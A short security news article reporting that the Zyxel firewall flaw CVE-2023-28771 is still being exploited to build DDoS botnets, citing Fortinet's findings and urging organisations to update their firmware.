The consequences of a vulnerability in Zyxel firewalls are long-lasting. Fortinet warns of a recent spike in DDoS attacks.

The CVE-2023-28771 vulnerability is now well known in the security world. The Taiwanese company Zyxel rolled out a patch at the end of April to close the vulnerability, but unfortunately organizations are still not following the motto of immediately implementing security updates. Experts sounded the alarm at the beginning of June, but twelve weeks after the patch was delivered, Fortinet came to the conclusion that there were hardly any improvements.

Fortinet has noticed a spike in DDoS attacks since late May, which researcher Cara Lin says is due to CVE-2023-28771. A peak between June 18th and 25th shows how actively the vulnerability is still being exploited. That’s because the code that needs to be iterated is publicly available. For example, hackers programming their botnets can carry out tailored DDoS attacks.

A hole in the wall

More specifically, they take advantage of the command injection capabilities provided by the vulnerability. They design Internet Key Exchange packets that they send to the firewall for capture. After successful execution, the firewall itself becomes part of the malicious botnet.

So we reiterate, if your company uses Zyxel firewalls or VPN servers, upgrade them as soon as possible. If you don’t believe us, believe the 9.8 rating the vulnerability has received. In this blog, the manufacturer gives advice on which firmware versions are vulnerable and which version you should update your devices to.

Zyxel has made the headlines with vulnerabilities in its security devices more often than they would like. Alarming reports also circulated in 2022 and 2021.